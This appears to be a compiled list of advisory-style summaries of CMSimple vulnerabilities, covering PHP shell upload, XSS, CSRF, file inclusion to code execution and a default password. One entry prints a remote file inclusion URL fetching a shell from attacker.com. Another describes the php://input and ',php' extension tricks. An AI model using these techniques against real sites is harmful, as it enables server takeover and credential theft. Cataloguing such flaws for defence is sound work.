The vulnerability allows an attacker to execute arbitrary commands on the target system by uploading a malicious PHP file. By appending ",php" to the end of the Extensions_userfiles field in the CMS Settings, an attacker can upload a shell.php file via the Media section and access it remotely.
An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, disclose or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.
An attacker can bypass security restrictions, perform unauthorized actions, and execute arbitrary script code in the context of the affected application by exploiting multiple vulnerabilities in CMSimple. The vulnerabilities exist in the file 'required_classes.php' located at 'http://www.example.com/CMSimple/plugins/filebrowser/classes/'. The attacker can use the following exploit code to execute arbitrary PHP code: http://www.example.com/CMSimple/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?. The exploit also affects the following files: CMSimple/2lang/index.php, CMSimple/2site/index.php, CMSimple/cmsimple/cms.php, CMSimple/index.php, CMSimple/plugins/index.php.
Several XSRF existed in this CMS, attacker can use them for: changing admin password, change user type, or deface the website.
Since the application is filtering user input with preg_replace, attackers can able to bypass restriction by using HTML to Unicode encoding. So the application let's attacker perform DOM based XSS.
CMSimple 5.4 is vulnerable to Local file inclusion (LFI) to Remote code execution (RCE) when an authenticated user is present. An attacker can exploit this vulnerability by changing the functions_file parameter to php://input and sending a malicious payload to the server. This will allow the attacker to execute arbitrary code on the server.
CMSimple 3.1 is vulnerable to Local File Inclusion and Arbitrary File Upload. An attacker can exploit this vulnerability to gain access to sensitive information and upload malicious files on the server.
A vulnerability in Cmsimple 5.4 allows an authenticated user to execute arbitrary code on the target system. This is achieved by sending a crafted POST request to the target system with a malicious payload. The payload is then executed on the target system.
CMSimple is prone to multiple security vulnerabilities including arbitrary PHP code-execution vulnerabilities, a weak authentication security-bypass vulnerability, and other security vulnerabilities. An attacker can exploit these issues to bypass certain security restrictions, perform unauthorized actions, and execute arbitrary script code in the context of the affected application. This may aid in further attacks. Additionally, any user can login to the CMSimple website with the default password 'test' and no username.
CMSimple is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.